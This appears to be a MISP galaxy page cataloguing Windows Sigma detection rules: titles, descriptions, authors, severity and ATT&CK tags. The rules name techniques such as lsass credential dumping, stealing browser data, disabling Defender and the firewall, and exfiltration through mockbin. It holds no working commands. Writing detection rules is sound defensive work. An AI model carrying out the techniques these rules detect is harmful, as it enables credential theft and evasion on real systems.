filename proc_creation_win_reg_open_command.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

Time Travel Debugging Utility Usage

Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.

Internal MISP references

UUID 0b4ae027-2a2d-4b93-8c7e-962caaba5b2a which can be used as unique global reference for Time Travel Debugging Utility Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ensar Şamil, @sblmsrsn, @oscd_initiative
creation_date 2020/10/06
falsepositive ['Legitimate usage by software developers/testers']
filename proc_creation_win_lolbin_tttracer_mod_load.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.credential_access', 'attack.t1218', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Esentutl Steals Browser Information

One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe

Internal MISP references

UUID 6a69f62d-ce75-4b57-8dce-6351eb55b362 which can be used as unique global reference for Esentutl Steals Browser Information in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/13
falsepositive ['Legitimate use']
filename proc_creation_win_esentutl_webcache.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1005']
Related clusters

To see the related clusters, click here.

HackTool - CrackMapExec Execution

This rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.

Internal MISP references

UUID 42a993dd-bb3e-48c8-b372-4d6684c4106c which can be used as unique global reference for HackTool - CrackMapExec Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/25
falsepositive ['Unknown']
filename proc_creation_win_hktl_crackmapexec_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.privilege_escalation', 'attack.credential_access', 'attack.discovery', 'attack.t1047', 'attack.t1053', 'attack.t1059.003', 'attack.t1059.001', 'attack.t1110', 'attack.t1201']
Related clusters

To see the related clusters, click here.

Change PowerShell Policies to an Insecure Level

Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.

Internal MISP references

UUID 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 which can be used as unique global reference for Change PowerShell Policies to an Insecure Level in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/01
falsepositive ['Administrator scripts']
filename proc_creation_win_powershell_set_policies_to_unsecure_level.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

DumpStack.log Defender Evasion

Detects the use of the filename DumpStack.log to evade Microsoft Defender

Internal MISP references

UUID 4f647cfa-b598-4e12-ad69-c68dd16caef8 which can be used as unique global reference for DumpStack.log Defender Evasion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/06
falsepositive ['Unknown']
filename proc_creation_win_susp_dumpstack_log_evasion.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Files Added To An Archive Using Rar.EXE

Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

Internal MISP references

UUID 6f3e2987-db24-4c78-a860-b4f4095a7095 which can be used as unique global reference for Files Added To An Archive Using Rar.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, E.M. Anhaus, oscd.community
creation_date 2019/10/21
falsepositive ['Highly likely if rar is a default archiver in the monitored environment.']
filename proc_creation_win_rar_compress_data.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

Rundll32 Execution Without Parameters

Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module

Internal MISP references

UUID 5bb68627-3198-40ca-b458-49f973db8752 which can be used as unique global reference for Rundll32 Execution Without Parameters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bartlomiej Czyz, Relativity
creation_date 2021/01/31
falsepositive ['False positives may occur if a user called rundll32 from CLI with no options']
filename proc_creation_win_rundll32_without_parameters.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002', 'attack.t1570', 'attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Potential Register_App.Vbs LOLScript Abuse

Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register a new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.

Internal MISP references

UUID 28c8f68b-098d-45af-8d43-8089f3e35403 which can be used as unique global reference for Potential Register_App.Vbs LOLScript Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/05
falsepositive ['Other VB scripts that leverage the same starting command line flags']
filename proc_creation_win_lolscript_register_app.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

AddinUtil.EXE Execution From Uncommon Directory

Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.

Internal MISP references

UUID 6120ac2a-a34b-42c0-a9bd-1fb9f459f348 which can be used as unique global reference for AddinUtil.EXE Execution From Uncommon Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
creation_date 2023/09/18
falsepositive ['Unknown']
filename proc_creation_win_addinutil_uncommon_dir_exec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Command Line Execution with Suspicious URL and AppData Strings

Detects a suspicious command line execution that includes a URL and an AppData string in the command line parameters, as used by several droppers (js/vbs > powershell)

Internal MISP references

UUID 1ac8666b-046f-4201-8aba-1951aaec03a3 which can be used as unique global reference for Command Line Execution with Suspicious URL and AppData Strings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
creation_date 2019/01/16
falsepositive ['High']
filename proc_creation_win_cmd_http_appdata.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.command_and_control', 'attack.t1059.003', 'attack.t1059.001', 'attack.t1105']
Related clusters

To see the related clusters, click here.

PUA - DIT Snapshot Viewer

Detects the use of the Ditsnap tool, an inspection tool for the Active Directory database, ntds.dit.

Internal MISP references

UUID d3b70aad-097e-409c-9df2-450f80dc476b which can be used as unique global reference for PUA - DIT Snapshot Viewer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Furkan Caliskan (@caliskanfurkan_)
creation_date 2020/07/04
falsepositive ['Legitimate admin usage']
filename proc_creation_win_pua_ditsnap.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

MMC20 Lateral Movement

Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe

Internal MISP references

UUID f1f3bf22-deb2-418d-8cce-e1a45e46a5bd which can be used as unique global reference for MMC20 Lateral Movement in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)
creation_date 2020/03/04
falsepositive ['Unlikely']
filename proc_creation_win_mmc_mmc20_lateral_movement.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1021.003']
Related clusters

To see the related clusters, click here.

File Decryption Using Gpg4win

Detects usage of Gpg4win to decrypt files

Internal MISP references

UUID 037dcd71-33a8-4392-bb01-293c94663e5a which can be used as unique global reference for File Decryption Using Gpg4win in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/09
falsepositive ['Unknown']
filename proc_creation_win_gpg4win_decryption.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Renamed PsExec Service Execution

Detects suspicious launch of a renamed version of the PSEXESVC service, which is not often used by legitimate administrators

Internal MISP references

UUID 51ae86a2-e2e1-4097-ad85-c46cb6851de4 which can be used as unique global reference for Renamed PsExec Service Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Legitimate administrative tasks']
filename proc_creation_win_renamed_sysinternals_psexec_service.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Operator Bloopers Cobalt Strike Commands

Detects use of Cobalt Strike commands accidentally entered in the CMD shell

Internal MISP references

UUID 647c7b9e-d784-4fda-b9a0-45c565a7b729 which can be used as unique global reference for Operator Bloopers Cobalt Strike Commands in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author _pete_0, TheDFIRReport
creation_date 2022/05/06
falsepositive ['Unknown']
filename proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003', 'stp.1u']
Related clusters

To see the related clusters, click here.

Audit Policy Tampering Via Auditpol

Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.

Internal MISP references

UUID 0a13e132-651d-11eb-ae93-0242ac130002 which can be used as unique global reference for Audit Policy Tampering Via Auditpol in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe (https://github.com/blueteam0ps)
creation_date 2021/02/02
falsepositive ['Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored']
filename proc_creation_win_auditpol_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Chromium Browser Headless Execution To Mockbin Like Site

Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).

Internal MISP references

UUID 1c526788-0abe-4713-862f-b520da5e5316 which can be used as unique global reference for Chromium Browser Headless Execution To Mockbin Like Site in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/09/11
falsepositive ['Unknown']
filename proc_creation_win_browsers_chromium_mockbin_abuse.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Potential Commandline Obfuscation Using Unicode Characters

Detects potential commandline obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

Internal MISP references

UUID e0552b19-5a83-4222-b141-b36184bb8d79 which can be used as unique global reference for Potential Commandline Obfuscation Using Unicode Characters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022/01/15
falsepositive ['Unknown']
filename proc_creation_win_susp_cli_obfuscation_unicode.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Powershell Token Obfuscation - Process Creation

Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation

Internal MISP references

UUID deb9b646-a508-44ee-b7c9-d8965921c6b6 which can be used as unique global reference for Powershell Token Obfuscation - Process Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/27
falsepositive ['Unknown']
filename proc_creation_win_powershell_token_obfuscation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027.009']
Related clusters

To see the related clusters, click here.

PUA - Radmin Viewer Utility Execution

Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines

Internal MISP references

UUID 5817e76f-4804-41e6-8f1d-5fa0b3ecae2d which can be used as unique global reference for PUA - Radmin Viewer Utility Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/22
falsepositive ['Unknown']
filename proc_creation_win_pua_radmin.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.lateral_movement', 'attack.t1072']
Related clusters

To see the related clusters, click here.

Windows Firewall Disabled via PowerShell

Detects attempts to disable the Windows Firewall using PowerShell

Internal MISP references

UUID 12f6b752-042d-483e-bf9c-915a6d06ad75 which can be used as unique global reference for Windows Firewall Disabled via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/14
falsepositive ['Unknown']
filename proc_creation_win_powershell_disable_firewall.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Browser Started with Remote Debugging

Detects browsers starting with the remote debugging flags, which is a technique often used to perform browser injection attacks

Internal MISP references

UUID b3d34dc5-2efd-4ae3-845f-8ec14921f449 which can be used as unique global reference for Browser Started with Remote Debugging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/27
falsepositive ['Unknown']
filename proc_creation_win_browsers_remote_debugging.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1185']
Related clusters

To see the related clusters, click here.

Suspicious Kernel Dump Using Dtrace

Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1

Internal MISP references

UUID 7124aebe-4cd7-4ccb-8df0-6d6b93c96795 which can be used as unique global reference for Suspicious Kernel Dump Using Dtrace in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/12/28
falsepositive ['Unknown']
filename proc_creation_win_dtrace_kernel_dump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Privilege Escalation via Named Pipe Impersonation

Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.

Internal MISP references

UUID 9bd04a79-dabe-4f1f-a5ff-92430265c96b which can be used as unique global reference for Privilege Escalation via Named Pipe Impersonation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/27
falsepositive ['Other programs that cause these patterns (please report)']
filename proc_creation_win_susp_priv_escalation_via_named_pipe.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021']
Related clusters

To see the related clusters, click here.

Suspicious Double Extension File Execution

Detects suspicious use of an .exe extension after a non-executable file extension (like .pdf.exe), or after a set of spaces or underscores, to cloak the executable file in spear phishing campaigns

Internal MISP references

UUID 1cdd9a09-06c9-4769-99ff-626e2b3991b8 which can be used as unique global reference for Suspicious Double Extension File Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/06/26
falsepositive ['Unknown']
filename proc_creation_win_susp_double_extension.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Suspicious Rundll32 Setupapi.dll Activity

The setupapi.dll library provides the InstallHinfSection function for processing INF files. An INF file may contain instructions to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence by modifying one of the Run or RunOnce registry keys, running a process or using other DLL chain calls (see references). The InstallHinfSection function in setupapi.dll calls the runonce.exe executable regardless of the actual content of the INF file.

Internal MISP references

UUID 285b85b1-a555-4095-8652-a8a4106af63f which can be used as unique global reference for Suspicious Rundll32 Setupapi.dll Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Konstantin Grishchenko, oscd.community
creation_date 2020/10/07
falsepositive ['Scripts and administrative tools that use INF files for driver installation with setupapi.dll']
filename proc_creation_win_rundll32_setupapi_installhinfsection.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Suspicious Execution From GUID Like Folder Names

Detects potentially suspicious execution from a GUID-like folder name located in a suspicious location such as %TEMP%, as seen in IcedID attacks

Internal MISP references

UUID 90b63c33-2b97-4631-a011-ceb0f47b77c3 which can be used as unique global reference for Suspicious Execution From GUID Like Folder Names in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/01
falsepositive ['Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly']
filename proc_creation_win_susp_execution_from_guid_folder_names.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Visual Studio Code Tunnel Service Installation

Detects the installation of VsCode tunnel (code-tunnel) as a service.

Internal MISP references

UUID 30bf1789-379d-4fdc-900f-55cd0a90a801 which can be used as unique global reference for Visual Studio Code Tunnel Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/10/25
falsepositive ['Legitimate installation of code-tunnel as a service']
filename proc_creation_win_vscode_tunnel_service_install.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Suspicious Scheduled Task Name As GUID

Detects creation of a scheduled task with a GUID-like name

Internal MISP references

UUID ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b which can be used as unique global reference for Suspicious Scheduled Task Name As GUID in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/31
falsepositive ['Legitimate software naming their tasks as GUIDs']
filename proc_creation_win_schtasks_guid_task_name.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Suspicious Key Manager Access

Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)

Internal MISP references

UUID a4694263-59a8-4608-a3a0-6f8d3a51664c which can be used as unique global reference for Suspicious Key Manager Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/21
falsepositive ['Administrative activity']
filename proc_creation_win_rundll32_keymgr.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1555.004']
Related clusters

To see the related clusters, click here.

Stop Windows Service Via PowerShell Stop-Service

Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service"

Internal MISP references

UUID c49c5062-0966-4170-9efd-9968c913a6cf which can be used as unique global reference for Stop Windows Service Via PowerShell Stop-Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/05
falsepositive ["There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly"]
filename proc_creation_win_powershell_stop_service.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution

Detects potentially suspicious child processes launched via the ScreenConnect client service.

Internal MISP references

UUID 7b582f1a-b318-4c6a-bf4e-66fe49bf55a5 which can be used as unique global reference for Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale
creation_date 2022/02/25
falsepositive ['If the script being executed make use of any of the utilities mentioned in the detection then they should filtered out or allowed.']
filename proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Suspicious Recursive Takeown

Adversaries can interact with DACLs using the built-in Windows command takeown, which can grant them higher permissions on specific files and folders

Internal MISP references

UUID 554601fb-9b71-4bcc-abf4-21a611be4fde which can be used as unique global reference for Suspicious Recursive Takeown in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/30
falsepositive ['Scripts created by developers and admins', 'Administrative activity']
filename proc_creation_win_takeown_recursive_own.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1222.001']
Related clusters

To see the related clusters, click here.

Windows Defender Definition Files Removed

Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files

Internal MISP references

UUID 9719a8aa-401c-41af-8108-ced7ec9cd75c which can be used as unique global reference for Windows Defender Definition Files Removed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/07
falsepositive ['Unknown']
filename proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Execution via WorkFolders.exe

Detects using WorkFolders.exe to execute an arbitrary control.exe

Internal MISP references

UUID 0bbc6369-43e3-453d-9944-cae58821c173 which can be used as unique global reference for Execution via WorkFolders.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Maxime Thiebaut (@0xThiebaut)
creation_date 2021/10/21
falsepositive ['Legitimate usage of the uncommon Windows Work Folders feature.']
filename proc_creation_win_susp_workfolders.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Command Patterns In Scheduled Task Creation

Detects scheduled task creation via "schtasks" where the task command contains potentially suspicious or uncommon patterns

Internal MISP references

UUID f2c64357-b1d2-41b7-849f-34d2682c0fad which can be used as unique global reference for Suspicious Command Patterns In Scheduled Task Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/23
falsepositive ['Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives']
filename proc_creation_win_schtasks_susp_pattern.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Tamper Windows Defender Remove-MpPreference

Detects attempts to remove Windows Defender configurations using the 'Remove-MpPreference' cmdlet

Internal MISP references

UUID 07e3cb2c-0608-410d-be4b-1511cb1a0448 which can be used as unique global reference for Tamper Windows Defender Remove-MpPreference in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/05
falsepositive ['Legitimate PowerShell scripts']
filename proc_creation_win_powershell_remove_mppreference.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Credential Dumping Via WER

Detects potential credential dumping via the Windows Error Reporting (WER) "LSASS Shtinkering" technique, which abuses Windows Error Reporting to dump lsass

Internal MISP references

UUID 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3 which can be used as unique global reference for Potential Credential Dumping Via WER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @pbssubhash , Nasreddine Bencherchali
creation_date 2022/12/08
falsepositive ['Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine.']
filename proc_creation_win_werfault_lsass_shtinkering.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

PUA- IOX Tunneling Tool Execution

Detects the use of IOX, a tool for port forwarding and intranet proxying

Internal MISP references

UUID d7654f02-e04b-4934-9838-65c46f187ebc which can be used as unique global reference for PUA- IOX Tunneling Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/10/08
falsepositive ['Legitimate use']
filename proc_creation_win_pua_iox.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION

Detects obfuscated PowerShell produced by the Invoke-Obfuscation VAR++ LAUNCHER

Internal MISP references

UUID e9f55347-2928-4c06-88e5-1a7f8169942e which can be used as unique global reference for Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_via_var.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious CustomShellHost Execution

Detects execution of the CustomShellHost binary where the child process is not 'C:\Windows\explorer.exe'

Internal MISP references

UUID 84b14121-9d14-416e-800b-f3b829c5a14d which can be used as unique global reference for Suspicious CustomShellHost Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Unknown']
filename proc_creation_win_lolbin_customshellhost.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Dllhost.EXE Execution Anomaly

Detects a "dllhost" process spawning with no command-line arguments, which is very rare and could indicate process injection activity or malware mimicking a similarly named system process.

Internal MISP references

UUID e7888eb1-13b0-4616-bd99-4bc0c2b054b9 which can be used as unique global reference for Dllhost.EXE Execution Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/27
falsepositive ['Unlikely']
filename proc_creation_win_dllhost_no_cli_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Elevated System Shell Spawned From Uncommon Parent Location

Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from an uncommon parent location.

Internal MISP references

UUID 178e615d-e666-498b-9630-9ed363038101 which can be used as unique global reference for Elevated System Shell Spawned From Uncommon Parent Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Tim Shelton (update fp)
creation_date 2022/12/05
falsepositive ['Unknown']
filename proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Renamed CreateDump Utility Execution

Detects use of a renamed copy of the legitimate createdump.exe LOLBIN utility to dump process memory

Internal MISP references

UUID 1a1ed54a-2ba4-4221-94d5-01dee560d71e which can be used as unique global reference for Renamed CreateDump Utility Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/09/20
falsepositive ['Command lines that use the same flags']
filename proc_creation_win_renamed_createdump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Assembly Loading Via CL_LoadAssembly.ps1

Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS", which are part of the "CL_LoadAssembly.ps1" script. This can be abused to load arbitrary assemblies and bypass AppLocker controls.

Internal MISP references

UUID c57872c7-614f-4d7f-a40d-b78c8df2d30d which can be used as unique global reference for Assembly Loading Via CL_LoadAssembly.ps1 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/05/21
falsepositive ['Unknown']
filename proc_creation_win_powershell_cl_loadassembly.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Cloudflared Tunnel Connections Cleanup

Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to clean up tunnel connections.

Internal MISP references

UUID 7050bba1-1aed-454e-8f73-3f46f09ce56a which can be used as unique global reference for Cloudflared Tunnel Connections Cleanup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/17
falsepositive ['Legitimate usage of Cloudflared.']
filename proc_creation_win_cloudflared_tunnel_cleanup.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1102', 'attack.t1090', 'attack.t1572']
Related clusters

To see the related clusters, click here.

Windows Admin Share Mount Via Net.EXE

Detects when an admin share is mounted using net.exe

Internal MISP references

UUID 3abd6094-7027-475f-9630-8ab9be7b9725 which can be used as unique global reference for Windows Admin Share Mount Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga
creation_date 2020/10/05
falsepositive ['Administrators']
filename proc_creation_win_net_use_mount_admin_share.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

